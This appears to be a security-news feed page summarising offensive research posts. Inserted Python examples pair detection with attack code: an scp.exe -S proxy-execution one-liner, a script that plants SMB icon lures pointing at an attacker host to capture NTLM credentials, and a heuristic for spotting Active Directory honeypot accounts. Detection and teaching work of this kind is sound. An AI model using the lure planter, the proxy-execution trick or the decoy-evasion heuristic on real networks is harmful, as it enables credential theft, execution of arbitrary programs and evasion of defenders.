scp.exe -S "cmd /c c:\windows\system32\calc.exe" . localhost:.
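The one-liner above abuses scp's -S option, which names the program scp should use for the encrypted connection: scp simply executes that program with ssh-style arguments, so a signed, in-box scp.exe ends up launching cmd.exe and, from it, calc.exe. The detection below is an added example, not part of the original post: it tokenises constructed process-creation events (Sysmon Event ID 1 shape, reduced to Image and CommandLine) and flags any scp.exe invocation whose -S value is not a plain ssh or ssh.exe path. The event samples and the allowlist are assumptions of this example.

```python
import re
from pathlib import PureWindowsPath

# A -S value is only legitimate if it is ssh or ssh.exe, optionally preceded
# by a drive/directory prefix. Directory names may contain spaces ("Program
# Files"), but a value such as "cmd /c ...\ssh.exe" does not match because
# "cmd /c C:" is not a valid path component.
LEGIT_TRANSPORT = re.compile(
    r'^(?:(?:[A-Za-z]:)?\\?(?:[^\\/:*?"<>|\r\n]+\\)*)ssh(?:\.exe)?$', re.IGNORECASE)

# Constructed sample events (Sysmon Event ID 1 shape, trimmed to two fields).
# They are NOT real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\OpenSSH\scp.exe",
     "CommandLine": r'scp.exe -S "cmd /c c:\windows\system32\calc.exe" . localhost:.'},
    {"Image": r"C:\Windows\System32\OpenSSH\scp.exe",
     "CommandLine": r"scp.exe -i C:\keys\id_ed25519 report.pdf backup@files.corp:/srv/in/"},
    {"Image": r"C:\Windows\System32\OpenSSH\scp.exe",
     "CommandLine": r'scp.exe -S "C:\Program Files\OpenSSH\ssh.exe" . files.corp:.'},
    {"Image": r"C:\Windows\System32\OpenSSH\scp.exe",
     "CommandLine": r"scp.exe -S C:\Users\bob\AppData\Local\Temp\stage.exe . localhost:."},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c dir"},
]


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted runs as one token."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def transport_program(cmdline):
    """Return the value handed to scp's -S option (either '-S prog' or '-Sprog'), or None."""
    toks = tokenize(cmdline)
    for i in range(1, len(toks)):
        tok = toks[i]
        if tok == "-S":
            return toks[i + 1] if i + 1 < len(toks) else None
        if tok.startswith("-S") and len(tok) > 2:
            return tok[2:]
    return None


def is_lolbin_use(event):
    """True when scp.exe is told to use anything but ssh as its transport program."""
    if PureWindowsPath(event["Image"]).name.lower() != "scp.exe":
        return False
    prog = transport_program(event["CommandLine"])
    if prog is None:
        return False
    return LEGIT_TRANSPORT.match(prog.strip()) is None


def hunt(events):
    """Command lines of every event that looks like scp -S proxy execution."""
    return [e["CommandLine"] for e in events if is_lolbin_use(e)]


if __name__ == "__main__":
    for line in hunt(SAMPLE_EVENTS):
        print("SUSPICIOUS:", line)
```

A complementary, harder-to-evade signal is the process tree: scp.exe as the parent of cmd.exe (or any non-ssh child), with the ssh-style options scp appends for the transport program (-x and -o… settings, then the host and a remote `scp -t` command) visible in the child's command line.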
CVE-2026-40369: Twelve Bytes to Escape the Browser Sandbox
Original text: “CVE-2026-40369: Twelve Bytes to Escape the Browser Sandbox” — voidsec, VoidSec (20 May 2026). Hex-Rays excerpts, exploit pseudo-code, and offsets below are reproduced verbatim with attribution captions; surrounding prose is paraphrased.
Executive Summary
CVE-2026-40369 is an unprivileged arbitrary 12-byte kernel write primitive sitting inside nt!ExpGetProcessInformation in ntoskrnl.exe. The bug is reachable from any…
https://core-jmp.org/2026/06/cve-2026-40369-twelve-bytes-browser-sandbox-escape/
Factoring “Short-Sleeve” RSA Keys with Polynomials
Original text: “Factoring “short-sleeve” RSA keys with polynomials” — Keegan Ryan, The Trail of Bits Blog (12 June 2026). Figures, decompiled code, and synthetic moduli below are reproduced verbatim with attribution captions; surrounding prose is paraphrased.
Executive Summary
What happens when an RSA modulus is generated from a private key whose bits are heavily biased…
https://core-jmp.org/2026/06/factoring-short-sleeve-rsa-keys-with-polynomials/
CVE-2025-8088 — Russia-Linked APTs Are Still Pwning Unpatched WinRAR Installs in Ukraine
Original text: “Russian APTs Still Exploiting Patched WinRAR Flaw CVE-2025-8088” — Pierluigi Paganini, Security Affairs (June 10, 2026). Trend Micro’s reporting and the two illustrations below are reproduced with attribution; prose is original analysis.
Executive Summary
Pierluigi Paganini’s Security Affairs writeup — built on a June 2026 Trend Micro report — documents that CVE-2025-8088, the…
https://core-jmp.org/2026/06/cve-2025-8088-russian-apts-winrar-ukraine-patch-gap/
From Prompt to Pwned: Chaining LLM and Web Bugs into Admin Takeover
Original text: "From prompt to pwned: chaining LLM and web bugs to Admin" — Norak, Quarkslab’s blog (05 June 2026). Code snippets, payloads and figures below are reproduced verbatim with attribution captions; surrounding prose is paraphrased.
Executive Summary
Prompt injection has become the headline LLM risk, but the Quarkslab red team exercise behind this article…
https://core-jmp.org/2026/06/from-prompt-to-pwned-chaining-llm-and-web-bugs-to-admin/
DCOMIllusionist — Fileless Windows Lateral Movement via .NET DCOM Server Deserialization
Original text: synacktiv/DCOMIllusionist README on GitHub — by Synacktiv, June 2026. Command-line help, CLSID/AppId lists, build commands and short code snippets below are reproduced verbatim with attribution. Diagrams are rendered from the repository’s img/ SVGs.
Executive Summary
DCOMIllusionist is Synacktiv’s open-source C# implementation of a .NET-DCOM-deserialisation lateral-movement primitive originally written up by James Forshaw —…
https://core-jmp.org/2026/06/synacktiv-dcomillusionist-dcom-fileless-lateral-movement/
tabby — A Minimal Position-Independent Windows x64 Shellcode Framework, Built Entirely on Linux
Original text: cocomelonc/tabby README on GitHub — by cocomelonc. The screenshots are reproduced from the repository’s img/ folder; technical code snippets and the project-rationale table are reproduced verbatim with attribution. Prose summary is original.
Executive Summary
tabby is cocomelonc’s minimal teaching framework for building position-independent Windows x64 shellcode in C, designed for the upcoming Malware…
https://core-jmp.org/2026/06/tabby-cocomelonc-shellcode-framework-windows-x64/
Weaponizing Writable SMB Shares to Steal Domain Credentials
Original text: “Weaponizing SMB Shares to Steal Domain Credentials” — Alex Neacsu, Security Café (April 21, 2026). Code snippets and screenshots below are reproduced verbatim with attribution captions.
Executive Summary
Alex Neacsu’s Security Café post is a clean, end-to-end walkthrough of a coercion technique every internal pentester has used and most internal AD environments are…
https://core-jmp.org/2026/06/weaponizing-smb-shares-steal-domain-credentials/
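The coercion class the post walks through works because Explorer resolves icon references in files it finds on a share, and a reference to a UNC path on an attacker host makes the browsing user's machine authenticate (NTLM) to that host. The block below is an added example, not Neacsu's code, and the excerpt above does not say which file type the post uses; the three text formats here (.scf, .url, desktop.ini) are this example's choice. It plants them into a constructed temporary "share" and then, for the defender, walks the share and reports every icon reference whose host is not on an assumed allowlist. Attacker host and allowlist are assumptions.

```python
import re
import tempfile
from pathlib import Path

# Assumed attacker host: wherever the NTLM listener (Responder, ntlmrelayx) sits.
ATTACKER_HOST = "10.13.37.5"


def icon_unc(host):
    return "\\\\%s\\share\\icon.ico" % host


# --- planting side: Explorer-parsed text formats that carry a remote icon ---

def build_scf(unc):
    return "[Shell]\r\nCommand=2\r\nIconFile=%s\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n" % unc


def build_url(unc):
    # Internet shortcut: IconFile + IconIndex are what the shell resolves.
    return "[InternetShortcut]\r\nURL=https://intranet.corp.local/\r\nIconIndex=0\r\nIconFile=%s\r\n" % unc


def build_desktop_ini(unc):
    # Folder customisation: the icon resource is fetched when the folder is listed.
    return "[.ShellClassInfo]\r\nIconResource=%s,0\r\n" % unc


def plant(share_dir, host=ATTACKER_HOST):
    """Drop the three lure files into a writable share; returns the names written."""
    unc = icon_unc(host)
    lures = {
        "@Q2_bonus_list.scf": build_scf(unc),   # leading '@' sorts it to the top of the listing
        "HR Portal.url": build_url(unc),
        "desktop.ini": build_desktop_ini(unc),
    }
    for name, body in lures.items():
        Path(share_dir, name).write_bytes(body.encode("ascii"))  # bytes: keep CRLF as-is
    return sorted(lures)


# --- hunting side: walk a share and report icon references to untrusted UNC hosts ---

UNC_ICON = re.compile(r"^\s*(?:IconFile|IconResource)\s*=\s*\\\\([^\\\r\n]+)\\", re.I | re.M)
TEXT_EXTS = {".scf", ".url", ".ini"}          # .lnk needs a binary parser, not covered here
TRUSTED_ICON_HOSTS = {"fs01.corp.local"}      # assumed allowlist of legitimate icon servers


def scan_share(share_dir, trusted=TRUSTED_ICON_HOSTS):
    """(relative path, host) for each icon reference pointing at a host outside the allowlist."""
    hits = []
    for path in Path(share_dir).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in TEXT_EXTS:
            continue
        text = path.read_text(encoding="utf-8", errors="ignore")
        for host in UNC_ICON.findall(text):
            if host.lower() not in trusted:
                hits.append((path.relative_to(share_dir).as_posix(), host))
    return sorted(hits)


def demo():
    """Constructed share: three lures plus two benign files the scanner must not flag."""
    share = tempfile.mkdtemp(prefix="writable_share_")
    planted = plant(share)
    Path(share, "Projects").mkdir()
    Path(share, "Projects", "desktop.ini").write_bytes(
        b"[.ShellClassInfo]\r\nIconResource=\\\\fs01.corp.local\\icons\\proj.ico,0\r\n")
    Path(share, "Tools.url").write_bytes(
        b"[InternetShortcut]\r\nURL=https://tools/\r\nIconFile=%SystemRoot%\\system32\\shell32.dll\r\nIconIndex=3\r\n")
    return planted, scan_share(share)


if __name__ == "__main__":
    planted, hits = demo()
    print("planted:", planted)
    for rel, host in hits:
        print("icon points off-share: %s -> %s" % (rel, host))
```

Which of these formats still triggers an automatic fetch depends on the Windows build and hardening in place, so test on a representative client before relying on one of them. On the defensive side the same scan, scheduled against every writable share, is cheap, and SMB signing plus blocking outbound 445 from workstations removes most of the value of the captured authentication.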
Hunting Active Directory Honeypots: Reading lastLogon as a Decoy Oracle
Original text: “Hunting Honey Pots as Red Teamers” — Charles F. Hamilton, CYPFER Offensive Practice (June 15, 2026). Screenshots and the sam_honeypot_enum.c source are reproduced verbatim with attribution captions.
Executive Summary
Honeytokens and honeypot accounts are some of the highest-signal tripwires defenders can place inside Active Directory: any interaction with them is, by construction, illegitimate.…
https://core-jmp.org/2026/06/hunting-active-directory-honeypots-lastlogon-oracle/
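The oracle in the title rests on one property of decoy accounts: they are built to look attractive (privileged group membership, an SPN) but nobody ever authenticates with them, so lastLogon stays at 0. The block below is an added example, not Hamilton's sam_honeypot_enum.c: it scores a constructed set of account records the way an enumerator would after asking every DC, and flags attractive accounts with no real logon history. lastLogon is kept per DC because the attribute is not replicated; a 0 on a single DC only means the account never authenticated there. The group list, thresholds and sample accounts are assumptions of this example.

```python
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_dt(ft):
    """AD stores lastLogon/pwdLastSet as 100 ns ticks since 1601-01-01; 0 means never."""
    return None if ft == 0 else FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def dt_to_filetime(dt):
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def _ft(y, m, d):
    return dt_to_filetime(datetime(y, m, d, tzinfo=timezone.utc))


NOW = datetime(2026, 6, 20, tzinfo=timezone.utc)

# Groups that make an account worth a red teamer's attention (assumed list).
PRIVILEGED = {
    "CN=Domain Admins,CN=Users,DC=corp,DC=local",
    "CN=Enterprise Admins,CN=Users,DC=corp,DC=local",
}

# Constructed sample of what an enumerator gets back after querying EVERY DC.
# lastLogonTimestamp would be replicated but lags by up to 14 days, so it is
# the wrong attribute for this check; lastLogon per DC is used instead.
ACCOUNTS = [
    {"sAMAccountName": "svc_backup_adm",
     "memberOf": ["CN=Domain Admins,CN=Users,DC=corp,DC=local"],
     "servicePrincipalName": ["MSSQLSvc/backup01.corp.local:1433"],
     "pwdLastSet": _ft(2026, 1, 10),
     "lastLogon": {"DC01": 0, "DC02": 0}},
    {"sAMAccountName": "sqlsvc",
     "memberOf": [],
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "pwdLastSet": _ft(2025, 3, 1),
     "lastLogon": {"DC01": 0, "DC02": _ft(2026, 6, 18)}},
    {"sAMAccountName": "helpdesk_adm",
     "memberOf": ["CN=Domain Admins,CN=Users,DC=corp,DC=local"],
     "servicePrincipalName": [],
     "pwdLastSet": _ft(2026, 6, 1),
     "lastLogon": {"DC01": _ft(2024, 1, 15), "DC02": 0}},
    {"sAMAccountName": "archive_admin",          # dormant, not decoy-shaped
     "memberOf": ["CN=Domain Admins,CN=Users,DC=corp,DC=local"],
     "servicePrincipalName": [],
     "pwdLastSet": _ft(2022, 5, 2),
     "lastLogon": {"DC01": _ft(2022, 5, 3), "DC02": 0}},
    {"sAMAccountName": "jdoe",
     "memberOf": [],
     "servicePrincipalName": [],
     "pwdLastSet": _ft(2026, 4, 2),
     "lastLogon": {"DC01": 0, "DC02": 0}},
]


def is_attractive(acct):
    return bool(set(acct["memberOf"]) & PRIVILEGED) or bool(acct["servicePrincipalName"])


def decoy_indicators(acct, now=NOW):
    """Reasons an attractive account looks like nobody real uses it (assumed heuristics)."""
    if not is_attractive(acct):
        return []
    logons = [filetime_to_dt(v) for v in acct["lastLogon"].values()]
    newest = max((d for d in logons if d is not None), default=None)
    pwd_set = filetime_to_dt(acct["pwdLastSet"])
    reasons = []
    if newest is None:
        reasons.append("lastLogon=0 on every DC queried: never logged on")
    elif pwd_set and now - pwd_set < timedelta(days=90) and now - newest > timedelta(days=365):
        reasons.append("password set %s but newest logon %s" % (pwd_set.date(), newest.date()))
    return reasons


def find_likely_decoys(accounts, now=NOW):
    """sAMAccountName -> reasons, for every account that trips the oracle."""
    found = {}
    for acct in accounts:
        reasons = decoy_indicators(acct, now)
        if reasons:
            found[acct["sAMAccountName"]] = reasons
    return found


if __name__ == "__main__":
    for name, reasons in find_likely_decoys(ACCOUNTS).items():
        print("%-16s %s" % (name, "; ".join(reasons)))
```

The obvious counter for defenders follows from the oracle itself: a decoy that is periodically logged on with (a scheduled synthetic logon against each DC) no longer stands out on lastLogon, and the enumeration traffic needed to read the attribute from every DC is itself a detection opportunity.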
BindFlt 0x50: Windows 11 25H2 Bugcheck from Malformed Batch Virtualisation Mappings
Research artifact: bindflt-0x50 — author not clearly listed. Independent PoC against bindflt.sys on Windows 11 25H2 (build 26100.8655). The artifact ships struct_fuzz.c, a Makefile, and a kernel minidump (061826-31687-01.dmp); all are reproduced or summarised verbatim below.
SHA-256 hashes (as shipped in the original README):
struct_fuzz.c — a8aa5b568b5d95f32fe2605aa979a4ab186498080174574c08f3b90532285a7a
struct_fuzz.exe (built on the VM) — 6bfbbc67a1f09655287ab3f1ec1ed3144dddb099ff914b2865c16937f57334b9
Executive…
https://core-jmp.org/2026/06/bindflt-0x50-windows-11-25h2-bugcheck-bfvalidateshortname/
Striga: A 500-Line Python Lifter from x86 to LLVM IR
Original text: “Striga: Lifting x86 to LLVM IR with Python” — mrexodia, secret club (May 21, 2026). Code blocks, the control-flow graph and short quotations below are reproduced verbatim with attribution captions.
Executive Summary
Lifting x86 machine code into a higher-level intermediate representation is the foundation of most modern static deobfuscators, devirtualizers, and binary translators…
https://core-jmp.org/2026/06/striga-python-lifter-x86-to-llvm-ir/
ROP Gadget Hunting on Windows: Building a DEP-Bypass Exploit Chain with rop_scanner
Project: github.com/oxfemale/rop_scanner — offline ROP / JOP / syscall / pivot gadget hunter for Windows PE files, written in C++17, decoder powered by Zydis. Cross-platform (Windows / Linux / macOS), single self-contained binary. Builds on the technique described by 0x12 Dark Development (@Salsa12__) in «Hunting ROP Gadgets in Windows DLLs» on Medium.
Executive Summary
Exploiting…
https://core-jmp.org/2026/06/rop-scanner-windows-rop-gadget-hunting-exploit-chain/
CVE-2026-42530 NGINX RCE
Affected: Nginx 1.31, if QUIC is enabled
The gentlemen at Nebula Security have promised a technical review of the hole today
Autonomous Vulnerability Hunting with MCP: Inside a Self-Improving 0-Day Pipeline
Original text: “Autonomous Vulnerability Hunting with MCP” (alt title: “Bullying LLMs into submission to find 0days at scale”) — Andy Gill, ZephrSec – Adventures In Information Security (2026-04-04). Code snippets, tables and figures below are reproduced verbatim with attribution captions.
Executive Summary
Andy Gill of ZephrSec spent the early part of 2026 wiring Claude Code…
https://core-jmp.org/2026/06/autonomous-vulnerability-hunting-mcp-claude-code-pipeline/
Windows ARM64 Internals: Pardon The Interruption — Interrupts on Windows for ARM
Original text: “Windows ARM64 Internals: Pardon The Interruption! Interrupts on Windows for ARM” — Connor McGarr, Connor McGarr’s Blog (January 2, 2026). All figures and code listings below are reproduced verbatim from the source with attribution captions.
Executive Summary
Most Windows kernel researchers grew up reading x64 internals: APIC, IDT, IDTR, KiIsrThunk. Windows on ARM…
https://core-jmp.org/2026/06/windows-arm64-internals-interrupts-gic-hyperv-secure-kernel/
LACUNA Chain: Ghost Frames Defeat Every Layer of EDR Call-Stack Detection
Original text: “LACUNA Chain: Ghost Frames — defeats all EDR layers of call-stack-based detection” — Mohamed Alzhrani (@0xmaz), 0xmaz.me (Jun 20, 2026). Licensed CC BY 4.0. Tables, code listings, diagrams and figures below are reproduced verbatim with attribution captions.
Executive Summary
Modern endpoint detection has moved its trustworthiness anchor from userland hooks to kernel-mode telemetry:…
https://core-jmp.org/2026/06/lacuna-chain-ghost-frames-defeat-edr-call-stack-detection/